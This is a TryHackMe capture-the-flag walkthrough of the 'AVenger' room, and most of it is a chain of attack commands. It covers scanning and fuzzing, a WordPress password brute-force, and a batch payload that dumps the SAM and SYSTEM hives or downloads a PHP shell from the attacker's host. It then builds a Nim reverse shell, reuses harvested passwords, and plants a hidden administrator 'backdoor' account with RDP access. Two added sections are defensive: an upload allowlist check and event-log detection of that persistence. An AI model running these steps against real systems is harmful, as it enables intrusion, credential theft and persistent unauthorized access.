
# AVenger

**Room Link:** <https://tryhackme.com/r/room/avenger>

**Scans**

Initial scan

**Kali**

```
nmap -A $VICTIM
```


Longer scan

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```


### TCP/80 - HTTP

**Find Pages**

There were too many 404s and 403s in the scan, so I changed to ffuf to ignore them.

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
```


The gift folder takes us to avenger.tryhackme.


**Add hostname to host file**

**Kali**

```
echo $VICTIM avenger.tryhackme  >> /etc/hosts
cat /etc/hosts
```


**Kali**

```
ffuf -u http://avenger.tryhackme/gift/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
```

**Kali**

```
wpscan --url http://avenger.tryhackme/gift --enumerate p
```


**Bruteforce admin page**

**Kali**

```
wpscan --url http://avenger.tryhackme/gift --passwords /usr/share/wordlists/rockyou.txt
```

## Initial Shell


**Kali**

```
git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/ 
subl exploit.bat
```

**exploit.bat**

```
@echo off

:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul

if %errorlevel% equ 0 (
    :: Run commands for NT AUTHORITY\SYSTEM
    reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
    reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
    :: Run commands for other users
    curl http://$KALI:82/shell.php -o C:\xampp\htdocs\shell.php
)
```

I tried bypassing the file type restriction with the shell above. I could see the bat file running, because it tried to grab the shell.php file, but I couldn't find a place to save the file where I could also see it on the website.

**Kali**

```
python2 -m SimpleHTTPServer 82
```


The Nim reverse shell worked because they accept exe files.

**Kali**

```
git clone https://github.com/Sn1r/Nim-Reverse-Shell.git
cd Nim-Reverse-Shell/
apt install mingw-w64 -y
```

**Kali**

```
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
```

**Kali**

```
subl rev_shell.nim
```


**Kali #1**

```
/root/.nimble/bin/nim c -d:mingw --app:gui --opt:speed -o:Calculator.exe rev_shell.nim
```


**Kali #2**

```
rlwrap nc -lvnp 443
```
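As an added example (not code from the walkthrough or the room), this is the kind of server-side upload check that would have rejected the .bat and .exe uploads described above: the extension must be on an allowlist and the content must start with that type's magic bytes, so a renamed executable is caught too. The allowlist and the sample files are constructed for illustration.

```python
# Added example, not part of the walkthrough: allowlist-based upload validation.
# A denylist of "dangerous" extensions is what lets .bat/.exe uploads through on
# the target above; an allowlist plus a content check closes that gap.
ALLOWED_TYPES = {  # extension -> magic bytes the content must start with
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def is_allowed_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file.

    Only the final extension is considered, after stripping any path component
    the client supplied, and it must be in ALLOWED_TYPES. The content must then
    start with that type's magic bytes, so an EXE renamed to .png (its content
    begins with the PE 'MZ' marker) is rejected as a type mismatch.
    """
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in name:
        return False, "no extension"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not on the allowlist"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, f"content does not look like a .{ext} file"
    return True, "ok"


# Constructed sample uploads mirroring the cases in the walkthrough.
SAMPLES = {
    "exploit.bat": b"@echo off\r\nwhoami /groups\r\n",
    "Calculator.exe": b"MZ\x90\x00\x03\x00\x00\x00",           # PE header start
    "Calculator.png": b"MZ\x90\x00\x03\x00\x00\x00",           # same EXE, renamed
    "..\\..\\shell.php.png": b"<?php /* not an image */ ?>",  # path + double extension
    "present.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}


def check_samples() -> dict[str, bool]:
    """Run every constructed sample through the check; only present.png passes."""
    return {name: is_allowed_upload(name, data)[0] for name, data in SAMPLES.items()}
```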


## Privilege Escalation

Found some credentials.

**Victim**

```
type C:\xampp\htdocs\gift\wp-config.php
```


From my computer I could access the MySQL server.

**Kali**

```
apt install mysql-client-core-5.7
mysql -h$VICTIM -ugift -pSurpriseMF
```

I was able to find a password but couldn't crack it.

**Kali (mysql)**

```
show databases;
use gift;
show tables;
select * from wp_users;
```


I found a password.

**Victim**

```
reg query HKLM /f password /t REG_SZ /s
```


**Kali**

```
remmina
Username: hugo
Password: SurpriseMF123!
```


I can run an administrator shell from the GUI.


**Victim**

```
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
```

**Kali**

```
remmina
Username: backdoor
Password: pass!123
```
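From the defender's side, as an added example (not part of the walkthrough), the account and registry commands above leave a distinctive trail in Windows event logs: a 4720 (user account created), 4732s (member added to a security-enabled local group) for Administrators and Remote Desktop Users, and a Sysmon event 13 (registry value set) on the Lsa\forceguest value. The sample events are constructed and simplified: field names follow those event schemas, but a real 4732 identifies the member by SID (MemberSid), which you would resolve to a name first.

```python
# Added example, not part of the walkthrough: flag the persistence pattern above
# (account created, then granted Administrators/RDP, then Lsa\forceguest changed)
# in Windows Security (4720, 4732) and Sysmon (13) events.
from collections import defaultdict

WATCHED_GROUPS = {"administrators", "remote desktop users"}
WATCHED_VALUES = {r"hklm\system\currentcontrolset\control\lsa\forceguest"}

# Constructed, simplified events modelled on the commands in the walkthrough.
# In 4732 the group is in TargetUserName and the member in MemberName; real
# events carry the member as MemberSid, which must be resolved to a name first.
SAMPLE_EVENTS = [
    {"EventID": 4720, "SubjectUserName": "hugo", "TargetUserName": "backdoor"},
    {"EventID": 4732, "SubjectUserName": "hugo", "TargetUserName": "Administrators",
     "MemberName": "backdoor"},
    {"EventID": 4732, "SubjectUserName": "hugo", "TargetUserName": "Remote Desktop Users",
     "MemberName": "backdoor"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\forceguest",
     "Details": "DWORD (0x00000000)"},
    # An existing service account promoted by an admin: no 4720, so not reported.
    {"EventID": 4732, "SubjectUserName": "admin", "TargetUserName": "Administrators",
     "MemberName": "svc_backup"},
]


def find_new_privileged_accounts(events):
    """Return {account: sorted groups} for accounts created (4720) in this batch
    and then added (4732) to a watched group, whatever the event order."""
    created = {e["TargetUserName"].lower() for e in events if e["EventID"] == 4720}
    groups = defaultdict(set)
    for e in events:
        if e["EventID"] == 4732 and e["TargetUserName"].lower() in WATCHED_GROUPS:
            groups[e["MemberName"].lower()].add(e["TargetUserName"])
    return {user: sorted(groups[user]) for user in created if groups[user]}


def find_lsa_tampering(events):
    """Return (image, value path, data) for Sysmon 13 events on watched Lsa values."""
    return [(e["Image"], e["TargetObject"], e["Details"]) for e in events
            if e["EventID"] == 13 and e["TargetObject"].lower() in WATCHED_VALUES]
```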


